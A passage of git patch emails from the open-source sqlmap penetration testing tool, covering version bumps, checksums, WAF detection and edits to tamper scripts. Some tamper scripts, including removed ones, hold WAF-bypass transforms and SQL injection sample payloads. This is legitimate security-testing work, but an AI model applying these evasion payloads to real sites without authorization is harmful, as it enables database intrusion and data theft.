065c5e8157d6a77ac33055868d007af28ccf06c5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 29 Sep 2018 23:10:03 +0200 Subject: [PATCH 303/428] Fixes #3264 --- lib/core/enums.py | 2 ++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 3 deletions(-) diff --git a/lib/core/enums.py b/lib/core/enums.py index 96fceee99d9..ab21db6bdde 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -256,6 +256,7 @@ class PAYLOAD: 3: "LIKE single quoted string", 4: "Double quoted string", 5: "LIKE double quoted string", + 6: "Identifier (e.g. column name)", } RISK = { @@ -275,6 +276,7 @@ class PAYLOAD: 6: "TOP", 7: "Table name", 8: "Column name", + 9: "Pre-WHERE (non-query)", } class METHOD: diff --git a/lib/core/settings.py b/lib/core/settings.py index c87a02653a5..b92b94e2d0f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.42" +VERSION = "1.2.9.43" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index cb5a6e1a088..8a3ee204033 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -38,7 +38,7 @@ cbf9428039f52d8ee80fcf79b6583b7c lib/core/common.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py 4d50e0f893477196d83608175d1a7de4 lib/core/dicts.py d4b3d448bcfd9f15d089fc81d38f4825 lib/core/dump.py -ab3f4f3e3019add5f4a2e28f7e8748a4 lib/core/enums.py +705fcf5b66cb4518a54e4d717c915968 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -987652d171b26820be98f557354bb5cf lib/core/settings.py +06e9273cc80dd4461dc5dc3518ca73a3 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From 80af22435ad47e9dc8ad4209a8adda54afd8ee7b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 2 Oct 2018 12:21:29 +0200 Subject: [PATCH 304/428] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0a724d40710..94555641904 100644 --- a/README.md +++ b/README.md @@ -4,7 +4,7 @@ sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. -**The sqlmap project is sponsored by [Netsparker Web Application Security Scanner](https://www.netsparker.com/?utm_source=github.com&utm_medium=referral&utm_content=sqlmap+repo&utm_campaign=generic+advert).** +**The sqlmap project is sponsored by [Netsparker Web Application Security Scanner](https://www.netsparker.com/scan-website-security-issues/?utm_source=sqlmap.org&utm_medium=banner&utm_campaign=github).** Screenshots ---- From 9182b90b2b9c50561856c651a110403c4932775f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 2 Oct 2018 12:57:52 +0200 Subject: [PATCH 305/428] Removing an obsolete utility --- extra/mssqlsig/update.py | 137 --------------------------------------- lib/core/settings.py | 2 +- txt/checksum.md5 | 3 +- 3 files changed, 2 insertions(+), 140 deletions(-) delete mode 100644 extra/mssqlsig/update.py diff --git a/extra/mssqlsig/update.py b/extra/mssqlsig/update.py deleted file mode 100644 index 84b94c54ee1..00000000000 --- a/extra/mssqlsig/update.py +++ /dev/null @@ -1,137 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) -See the file 'LICENSE' for copying permission -""" - -import codecs -import os -import re -import urllib2 -import urlparse - -from xml.dom.minidom import Document - -# Path to the XML file with signatures -MSSQL_XML = os.path.abspath("../../xml/banner/mssql.xml") - -# Url to update Microsoft SQL Server XML versions file from -MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx" - -def updateMSSQLXML(): - if not os.path.exists(MSSQL_XML): - errMsg = "[ERROR] file '%s' does not exist. Please run the script from its parent directory" % MSSQL_XML - print errMsg - return - - infoMsg = "[INFO] retrieving data from '%s'" % MSSQL_VERSIONS_URL - print infoMsg - - try: - req = urllib2.Request(MSSQL_VERSIONS_URL) - f = urllib2.urlopen(req) - mssqlVersionsHtmlString = f.read() - f.close() - except urllib2.URLError: - __mssqlPath = urlparse.urlsplit(MSSQL_VERSIONS_URL) - __mssqlHostname = __mssqlPath[1] - - warnMsg = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname - warnMsg += " check your Internet connection and retry" - print warnMsg - - return - - releases = re.findall(r"class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I) - releasesCount = len(releases) - - # Create the minidom document - doc = Document() - - # Create the base element - root = doc.createElement("root") - doc.appendChild(root) - - for index in xrange(0, releasesCount): - release = releases[index] - - # Skip Microsoft SQL Server 6.5 because the HTML - # table is in another format - if release == "6.5": - continue - - # Create the base element - signatures = doc.createElement("signatures") - signatures.setAttribute("release", release) - root.appendChild(signatures) - - startIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index]) - - if index == releasesCount - 1: - stopIdx = len(mssqlVersionsHtmlString) - else: - stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1]) - - mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx] - servicepackVersion = re.findall(r"    [\r]*\n", mssqlVersionsReleaseString, re.I) - - for servicePack, version in servicepackVersion: - if servicePack.startswith(" "): - servicePack = servicePack[1:] - if "/" in servicePack: - servicePack = servicePack[:servicePack.index("/")] - if "(" in servicePack: - servicePack = servicePack[:servicePack.index("(")] - if "-" in servicePack: - servicePack = servicePack[:servicePack.index("-")] - if "*" in servicePack: - servicePack = servicePack[:servicePack.index("*")] - if servicePack.startswith("+"): - servicePack = "0%s" % servicePack - - servicePack = servicePack.replace("\t", " ") - servicePack = servicePack.replace("No SP", "0") - servicePack = servicePack.replace("RTM", "0") - servicePack = servicePack.replace("TM", "0") - servicePack = servicePack.replace("SP", "") - servicePack = servicePack.replace("Service Pack", "") - servicePack = servicePack.replace(" element - signature = doc.createElement("signature") - signatures.appendChild(signature) - - # Create a element - versionElement = doc.createElement("version") - signature.appendChild(versionElement) - - # Give the elemenet some text - versionText = doc.createTextNode(version) - versionElement.appendChild(versionText) - - # Create a element - servicepackElement = doc.createElement("servicepack") - signature.appendChild(servicepackElement) - - # Give the elemenet some text - servicepackText = doc.createTextNode(servicePack) - servicepackElement.appendChild(servicepackText) - - # Save our newly created XML to the signatures file - mssqlXml = codecs.open(MSSQL_XML, "w", "utf8") - doc.writexml(writer=mssqlXml, addindent=" ", newl="\n") - mssqlXml.close() - - infoMsg = "[INFO] done. retrieved data parsed and saved into '%s'" % MSSQL_XML - print infoMsg - -if __name__ == "__main__": - updateMSSQLXML() diff --git a/lib/core/settings.py b/lib/core/settings.py index b92b94e2d0f..a7ca899dad6 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.43" +VERSION = "1.2.10.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8a3ee204033..6b893f61ffc 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -8,7 +8,6 @@ acba8b5dc93db0fe6b2b04ff0138c33c extra/icmpsh/icmpsh.exe_ 708e9fd35dabcbfcd10e91bbc14f091f extra/icmpsh/icmpsh_m.py 2d020d2bdcee1170805f48839fdb89df extra/icmpsh/__init__.py 1e5532ede194ac9c083891c2f02bca93 extra/__init__.py -fe141ec3178a46e7151c7f34bb747c68 extra/mssqlsig/update.py ff90cb0366f7cefbdd6e573e27e6238c extra/runcmd/runcmd.exe_ 1e5532ede194ac9c083891c2f02bca93 extra/safe2bin/__init__.py b6c0f2047e9bea90f4d5c5806c0f6a9a extra/safe2bin/safe2bin.py @@ -50,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -06e9273cc80dd4461dc5dc3518ca73a3 lib/core/settings.py +a1ed8cb875f1b56683b2b320ccb63197 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From d38a0542d831da179041862779d7d55bf9cac8ab Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 2 Oct 2018 13:48:39 +0200 Subject: [PATCH 306/428] Minor update --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/cloudflare.py | 1 + 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index a7ca899dad6..dcfff689763 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.0" +VERSION = "1.2.10.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 6b893f61ffc..428403d5391 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a1ed8cb875f1b56683b2b320ccb63197 lib/core/settings.py +5f2410ec4abd6170ac6244321a959323 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -404,7 +404,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py -94b50385a9d462492e3a639d71aaa1c3 waf/cloudflare.py +a1d16d7106c9c66072aa58530c288515 waf/cloudflare.py a8affab0838c6a1fe683d5b7333d7a69 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py c84e515440fe482476c1f2687bd9960f waf/crawlprotect.py diff --git a/waf/cloudflare.py b/waf/cloudflare.py index e38f48e291d..249b4b8b528 100644 --- a/waf/cloudflare.py +++ b/waf/cloudflare.py @@ -25,6 +25,7 @@ def detect(get_page): retval |= re.search(r"CloudFlare Ray ID:|var CloudFlare=", page or "") is not None retval |= all(_ in (page or "") for _ in ("Attention Required! | Cloudflare", "Please complete the security check to access")) retval |= all(_ in (page or "") for _ in ("Attention Required! | Cloudflare", "Sorry, you have been blocked")) + retval |= any(_ in (page or "") for _ in ("CLOUDFLARE_ERROR_500S_BOX", "::CAPTCHA_BOX::")) if retval: break From 1b6365b195c1c52159ecd44ee9986ecbdc2a7519 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 2 Oct 2018 14:07:14 +0200 Subject: [PATCH 307/428] Minor cleanup --- lib/core/settings.py | 2 +- tamper/securesphere.py | 26 -------------------------- tamper/symboliclogical.py | 3 ++- tamper/unmagicquotes.py | 6 +++--- tamper/xforwardedfor.py | 2 ++ txt/checksum.md5 | 9 ++++----- 6 files changed, 12 insertions(+), 36 deletions(-) delete mode 100644 tamper/securesphere.py diff --git a/lib/core/settings.py b/lib/core/settings.py index dcfff689763..59a3fa0ba0d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.1" +VERSION = "1.2.10.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/securesphere.py b/tamper/securesphere.py deleted file mode 100644 index 998a69e2cc0..00000000000 --- a/tamper/securesphere.py +++ /dev/null @@ -1,26 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) -See the file 'LICENSE' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Appends special crafted string for bypassing Imperva SecureSphere WAF - - Reference: - * http://seclists.org/fulldisclosure/2011/May/163 - - >>> tamper('1 AND 1=1') - "1 AND 1=1 and '0having'='0having'" - """ - - return payload + " and '0having'='0having'" if payload else payload diff --git a/tamper/symboliclogical.py b/tamper/symboliclogical.py index ea34b54c98b..aad77f1722d 100644 --- a/tamper/symboliclogical.py +++ b/tamper/symboliclogical.py @@ -6,6 +6,7 @@ """ import re +import urllib from lib.core.enums import PRIORITY @@ -25,6 +26,6 @@ def tamper(payload, **kwargs): retVal = payload if payload: - retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload)) + retVal = re.sub(r"(?i)\bAND\b", urllib.quote("&&"), re.sub(r"(?i)\bOR\b", urllib.quote("||"), payload)) return retVal diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py index b6419e74d85..84746e9eb2f 100644 --- a/tamper/unmagicquotes.py +++ b/tamper/unmagicquotes.py @@ -25,7 +25,7 @@ def tamper(payload, **kwargs): * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string >>> tamper("1' AND 1=1") - '1%bf%27-- ' + '1%bf%27-- -' """ retVal = payload @@ -46,7 +46,7 @@ def tamper(payload, **kwargs): _ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal) if _ != retVal: retVal = _ - retVal += "-- " + retVal += "-- -" elif not any(_ in retVal for _ in ('#', '--', '/*')): - retVal += "-- " + retVal += "-- -" return retVal diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py index e14b4909260..b0c8d85959e 100644 --- a/tamper/xforwardedfor.py +++ b/tamper/xforwardedfor.py @@ -14,8 +14,10 @@ def dependencies(): def randomIP(): numbers = [] + while not numbers or numbers[0] in (10, 172, 192): numbers = sample(xrange(1, 255), 4) + return '.'.join(str(_) for _ in numbers) def tamper(payload, **kwargs): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 428403d5391..a49cf03c9bd 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5f2410ec4abd6170ac6244321a959323 lib/core/settings.py +501b38eaa341d98935b4fc3cecefaffc lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -265,7 +265,6 @@ a47aafcbc1de2deb85160e29de46f748 tamper/plus2concat.py 759b86cf3bb1d7871dc6489538253f94 tamper/plus2fnconcat.py 078494e1217400b485ef653108d32699 tamper/randomcase.py 28626e4b8c673228dcfe4f1627a9e08b tamper/randomcomments.py -938bfac6e55a8823e4a66cd29166d980 tamper/securesphere.py cac8a56f8cc6c14524ee392daa5ae2fd tamper/space2comment.py 4e6da2aca962b6110652e5f83dce5cd7 tamper/space2dash.py 7cdbae483262f66ef5d77521c59d9621 tamper/space2hash.py @@ -278,14 +277,14 @@ b55ed15af74ffefc4dc303646c7c6482 tamper/space2mssqlblank.py 72a547bc3bf32dba0d1c3093988df8af tamper/space2plus.py a74cd6375c5d5d253e2e7014b00ecd33 tamper/space2randomblank.py 93fc10b57586936cef05e88227c84ad0 tamper/sp_password.py -041cb567dff6bb6e7389e12ab3fb84c6 tamper/symboliclogical.py +690eb5200c9e61e54cd8952edaefda23 tamper/symboliclogical.py 6679c4ffb7322315a738dcfa68c6fb7c tamper/unionalltounion.py -51d20b5cb5a50fc2e44d39087f865d23 tamper/unmagicquotes.py +0a7e97374019321ffc606d41535f26d6 tamper/unmagicquotes.py cc212839f55692d422beef3a8e22a8d4 tamper/uppercase.py f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py -bb87c2c0ec66927015c9709aaaf93561 tamper/xforwardedfor.py +d8279aa1633e2485ed751eb0361d1c8e tamper/xforwardedfor.py 1ebf563bb2cb18b68ea952418bba0ec5 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py From 03bbfdbc56b9bc83892e21277dddac0353a7c135 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 2 Oct 2018 14:11:26 +0200 Subject: [PATCH 308/428] Can't work out of the box (too many unknowns) --- lib/core/settings.py | 2 +- tamper/nonrecursivereplacement.py | 40 ------------------------------- txt/checksum.md5 | 3 +-- 3 files changed, 2 insertions(+), 43 deletions(-) delete mode 100644 tamper/nonrecursivereplacement.py diff --git a/lib/core/settings.py b/lib/core/settings.py index 59a3fa0ba0d..141b3560367 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.2" +VERSION = "1.2.10.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/nonrecursivereplacement.py b/tamper/nonrecursivereplacement.py deleted file mode 100644 index a0a7d04b0d2..00000000000 --- a/tamper/nonrecursivereplacement.py +++ /dev/null @@ -1,40 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) -See the file 'LICENSE' for copying permission -""" - -import random -import re - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def tamper(payload, **kwargs): - """ - Replaces predefined SQL keywords with representations suitable for replacement filters (e.g. SELECT -> SELSELECTECT) - - Notes: - * Useful to bypass very weak custom filters - - >>> random.seed(0) - >>> tamper('1 UNION SELECT 2--') - '1 UNIOUNIONN SELESELECTCT 2--' - """ - - keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE") - retVal = payload - - warnMsg = "currently only couple of keywords are being processed %s. " % str(keywords) - warnMsg += "You can set it manually according to your needs" - singleTimeWarnMessage(warnMsg) - - if payload: - for keyword in keywords: - _ = random.randint(1, len(keyword) - 1) - retVal = re.sub(r"(?i)\b%s\b" % keyword, "%s%s%s" % (keyword[:_], keyword, keyword[_:]), retVal) - - return retVal diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a49cf03c9bd..95a547ffb4b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -501b38eaa341d98935b4fc3cecefaffc lib/core/settings.py +2f0cd79e7e10a6e137f4748a589c4c0b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -257,7 +257,6 @@ ef0639557a79e57b06296c4bc223ebef tamper/htmlencode.py 1c4d622d1c2c77fc3db1f8b3849467ee tamper/modsecurityversioned.py f177a624c2cd3431c433769c6eb995e7 tamper/modsecurityzeroversioned.py 91b63afdb96b1d51c12a14cbd425d310 tamper/multiplespaces.py -efd1917c6ccc632f044084a30e0e0f98 tamper/nonrecursivereplacement.py dcf3458f9010ca41bc4b56804f15792c tamper/overlongutf8more.py a3a3cef042b864c4226b63f89548f939 tamper/overlongutf8.py 89f8753a0ef65d2bb860c8864e9e935a tamper/percentage.py From ed5f4abebd00a71f36cd366d978c100d4219fde1 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 2 Oct 2018 14:56:20 +0200 Subject: [PATCH 309/428] Minor updates --- lib/core/settings.py | 2 +- txt/checksum.md5 | 8 ++++---- xml/banner/generic.xml | 22 +++++++++++----------- xml/banner/set-cookie.xml | 22 +++++++++++++++++++--- xml/banner/x-powered-by.xml | 18 +++++++++++++++++- 5 files changed, 52 insertions(+), 20 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 141b3560367..613135d4fb2 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.3" +VERSION = "1.2.10.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 95a547ffb4b..17a56a06348 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2f0cd79e7e10a6e137f4748a589c4c0b lib/core/settings.py +40d7d26b71f11cbc128a0ef7c67e2da0 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -457,17 +457,17 @@ a687449cd4e45f69e33b13d41e021480 waf/uspses.py 68e332530fab216d017ede506c3fec2f waf/yundun.py bea35ba732ccc9548e6c4023cea6832b waf/yunsuo.py 47f8f6623841232a93c5229d6c1bebfe waf/zenedge.py -dc394c5b90ada0a5d5853b5ad1f7d56d xml/banner/generic.xml +e68f399aeaa5b516f043af88dd4871a0 xml/banner/generic.xml d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml 7b21aeb3ad66d7686eacd23a6346292c xml/banner/mysql.xml 9b262a617b06af56b1267987d694bf6f xml/banner/oracle.xml c26cd4fa986ddc9f6d92dd87c8fc61cb xml/banner/postgresql.xml 4970709ca31bcaea5eb79547a132606a xml/banner/server.xml d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml -58be20a3b29a9108d043786907700469 xml/banner/set-cookie.xml +5fa1805d3007c68b051f2c70afcf41ed xml/banner/set-cookie.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml -817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml +ccb5e02a692f75d11b7fd00f1db48bf5 xml/banner/x-powered-by.xml 3059d50cf0cd17a403c17833f0bcd4df xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml diff --git a/xml/banner/generic.xml b/xml/banner/generic.xml index 27e8bdd8629..6e671825f0b 100644 --- a/xml/banner/generic.xml +++ b/xml/banner/generic.xml @@ -33,47 +33,47 @@ - + - + - + - + - + - + - + - + - + - + - + diff --git a/xml/banner/set-cookie.xml b/xml/banner/set-cookie.xml index 4e85296b8a6..fc454fcaaa0 100644 --- a/xml/banner/set-cookie.xml +++ b/xml/banner/set-cookie.xml @@ -19,19 +19,35 @@ + + + + + + + + + + + + + + + + - - + + - + diff --git a/xml/banner/x-powered-by.xml b/xml/banner/x-powered-by.xml index 633a35e5cff..64741769c85 100644 --- a/xml/banner/x-powered-by.xml +++ b/xml/banner/x-powered-by.xml @@ -1,6 +1,6 @@ - + @@ -15,6 +15,22 @@ + + + + + + + + + + + + + + + + From 79e45bd8d750d9b084bc55d3ab9c7839f5f63e78 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 2 Oct 2018 15:10:31 +0200 Subject: [PATCH 310/428] Minor update --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/banner/server.xml | 48 +++++++++++++++++++++++++++++++++++++++++-- 3 files changed, 49 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 613135d4fb2..05ab7c4fc2d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.4" +VERSION = "1.2.10.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 17a56a06348..7d88c2debad 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -40d7d26b71f11cbc128a0ef7c67e2da0 lib/core/settings.py +af9f01fd0d42d37f40e41f93907e2528 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -462,7 +462,7 @@ d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml 7b21aeb3ad66d7686eacd23a6346292c xml/banner/mysql.xml 9b262a617b06af56b1267987d694bf6f xml/banner/oracle.xml c26cd4fa986ddc9f6d92dd87c8fc61cb xml/banner/postgresql.xml -4970709ca31bcaea5eb79547a132606a xml/banner/server.xml +5f8975d03665aad58c3ee8acea85b06b xml/banner/server.xml d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml 5fa1805d3007c68b051f2c70afcf41ed xml/banner/set-cookie.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml diff --git a/xml/banner/server.xml b/xml/banner/server.xml index 737a13f143d..2a6fc28e300 100644 --- a/xml/banner/server.xml +++ b/xml/banner/server.xml @@ -802,13 +802,57 @@ - + + + + + - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + From 2e53096962bd37339ce7addc72ad0d6c89d3cc96 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 3 Oct 2018 11:02:13 +0200 Subject: [PATCH 311/428] Fixes #3268 --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 6 ++++-- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 05ab7c4fc2d..68aa89b571c 